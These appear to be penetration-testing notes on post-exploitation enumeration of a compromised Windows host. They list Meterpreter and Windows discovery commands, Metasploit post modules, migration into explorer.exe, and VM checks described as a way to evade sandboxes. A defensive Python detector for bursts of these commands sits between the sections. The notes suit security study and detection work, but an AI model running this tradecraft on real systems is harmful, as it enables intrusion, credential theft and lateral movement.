Enumeration

1. Enumerating System Information

Gather basic system information:

systeminfo                                              # Windows: OS version, build, architecture, hotfixes
sysinfo                                                 # Meterpreter equivalent of systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn   # Windows: installed updates with install dates

  • systeminfo: Displays OS version, architecture, and installed patches.

  • sysinfo: The Meterpreter equivalent of systeminfo.

  • wmic qfe get ...: Lists installed Windows updates (hotfix IDs and install dates).


2. Enumerating Users & Groups

Meterpreter Commands:

getuid          # Get current user
getprivs        # Get available privileges
background      # Background the current session and return to msfconsole
use post/windows/gather/enum_logged_on_users   # msfconsole: logged-on users module
set SESSION 1   # Point the module at session 1
run
sessions 1      # Interact with session 1 again
shell           # Drop from Meterpreter into a Windows command shell

Windows Commands:

whoami
whoami /priv        # Check user privileges
net users           # List all users
net user administrator  # Check admin user details
net localgroup      # List local groups
net localgroup administrators   # List members of the local Administrators group

  • whoami /priv: Lists the token privileges of the current user, the starting point for privilege-escalation checks.

  • net users: Lists local user accounts.

  • net localgroup administrators: Shows who is in the local Administrators group.


3. Enumerating Network Information

ipconfig             # Show basic network details
ipconfig /all        # Show detailed network config (DNS, DHCP, MAC)
route print          # Display routing table
arp -a               # Show ARP cache (recently contacted hosts)
netstat -ano         # Show active connections and listening ports with owning PIDs

  • ipconfig /all: Useful for finding internal IPs, gateways, and DNS servers.

  • netstat -ano: Identifies open ports and the process IDs (-o) that own them.


4. Enumerating Processes & Services

pgrep explorer.exe    # Meterpreter: find the PID of explorer.exe
migrate 2252          # Meterpreter: migrate the session into that PID
net start             # List running services
wmic service list brief  # Summarize services (name, state, start mode, PID)
tasklist /SVC         # List processes and the services hosted in each
schtasks /query /fo LIST  # List scheduled tasks

  • migrate 2252: Moves the Meterpreter session into another process; 2252 is the example PID returned by pgrep, and explorer.exe is a common choice because it is long-lived.

  • schtasks /query /fo LIST: Identifies scheduled tasks (a common persistence mechanism).
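
The Windows commands in sections 1 to 4 run as child processes of the attacker's shell, so process-creation telemetry (Sysmon event 1 or Windows 4688 with command-line auditing) records them; the example below, added here and not part of the original notes, flags a host/user that runs several categories of them within a short window. Assumptions: the log records are constructed in a simplified 4688-like shape, and the category patterns, window and threshold are illustrative values to tune for your environment.

```python
"""Flag bursts of the host-discovery commands on this page in process-creation logs.
Added example, not from the original notes; every record below is constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Discovery category -> regex over the logged command line (case-insensitive).
DISCOVERY = {
    "system_info": r"\bsysteminfo\b|\bwmic\b.*\bqfe\b",
    "account_discovery": r"\bwhoami\b|\bnet\s+(user|users|localgroup)\b",
    "network_discovery": r"\bipconfig\b|\broute\s+print\b|\barp\s+-a\b|\bnetstat\b",
    "process_service_discovery": r"\btasklist\b|\bnet\s+start\b|\bwmic\b.*\bservice\b",
    "scheduled_tasks": r"\bschtasks\b",
}
PATTERNS = {name: re.compile(rx, re.IGNORECASE) for name, rx in DISCOVERY.items()}

def event(ts, user, parent, cmd):  # minimal 4688-like record, constructed for the sample
    return {"ts": ts, "host": "WS01", "user": user, "parent": parent, "cmd": cmd}

TMP = "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"  # constructed suspicious parent
SAMPLE_EVENTS = [  # alice's single ipconfig is benign; bob's shell enumerates within 20 s
    event("2024-05-01T10:00:01", "CORP\\alice", "C:\\Windows\\explorer.exe", "ipconfig"),
    event("2024-05-01T10:02:10", "CORP\\bob", TMP, "cmd.exe /c whoami /priv"),
    event("2024-05-01T10:02:14", "CORP\\bob", TMP, "net localgroup administrators"),
    event("2024-05-01T10:02:21", "CORP\\bob", TMP, "systeminfo"),
    event("2024-05-01T10:02:30", "CORP\\bob", TMP, "schtasks /query /fo LIST"),
]

def classify(cmd):
    return {name for name, rx in PATTERNS.items() if rx.search(cmd)}

def detect_discovery_bursts(events, window_s=120, min_categories=3):
    """One alert per (host, user) whose discovery commands cover at least
    min_categories distinct categories inside some window_s-second window."""
    by_actor = defaultdict(list)
    for rec in sorted(events, key=lambda r: r["ts"]):
        if cats := classify(rec["cmd"]):
            t = datetime.fromisoformat(rec["ts"])
            by_actor[(rec["host"], rec["user"])].append((t, cats, rec))
    alerts = []
    for (host, user), hits in by_actor.items():
        for i, (t_end, _, _) in enumerate(hits):  # trailing window ending at each hit
            window = [h for h in hits[: i + 1] if (t_end - h[0]).total_seconds() <= window_s]
            seen = set().union(*(h[1] for h in window))
            if len(seen) >= min_categories:
                alerts.append({"host": host, "user": user, "categories": sorted(seen),
                               "parents": sorted({h[2]["parent"] for h in window}),
                               "commands": [h[2]["cmd"] for h in window]})
                break  # the first qualifying window is enough for triage
    return alerts
```

The Metasploit post modules in section 5 largely call the Meterpreter API rather than spawning processes, so process-creation logs alone will not record them; they need other telemetry.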


5. Automating Windows Local Enumeration

5.1 Enumerate Privileges

Checks the privileges of the current session to identify potential privilege escalation opportunities.

use post/windows/gather/win_privs
set SESSION 1
run

  • Identifies high-privilege rights (e.g., SeDebugPrivilege, SeImpersonatePrivilege).

  • Helps determine if the session can escalate privileges.


5.2 Enumerate Logged-On Users

Lists all users currently logged into the system.

use post/windows/gather/enum_logged_on_users
set SESSION 1
run

  • Useful for identifying target accounts for credential theft.

  • Helps in planning privilege escalation or lateral movement.


5.3 Check if the System is a Virtual Machine (VM)

Determines whether the compromised system is running inside a virtual environment.

use post/windows/gather/checkvm
set SESSION 1
run

  • Helps attackers evade sandbox environments and avoid detection.

  • Identifies Hyper-V, VMware, VirtualBox, or cloud-based VMs.


5.4 Enumerate Installed Applications

Lists all installed applications on the system.

use post/windows/gather/enum_applications
set SESSION 1
run

  • Helps identify security software, vulnerable applications, or useful tools.

  • May reveal password managers, remote access tools, or exploits.


5.5 Enumerate Computers in the Network

Gathers information about other computers in the same Windows domain or workgroup.

use post/windows/gather/enum_computers
set SESSION 1
run

  • Useful for network reconnaissance and lateral movement.

  • Identifies potential targets for further exploitation.


5.6 Enumerate Network Shares

Lists all network shares accessible from the compromised system.

use post/windows/gather/enum_shares
set SESSION 1
run

  • Identifies shared files and folders that may contain sensitive data.

  • Helps in data exfiltration or privilege escalation.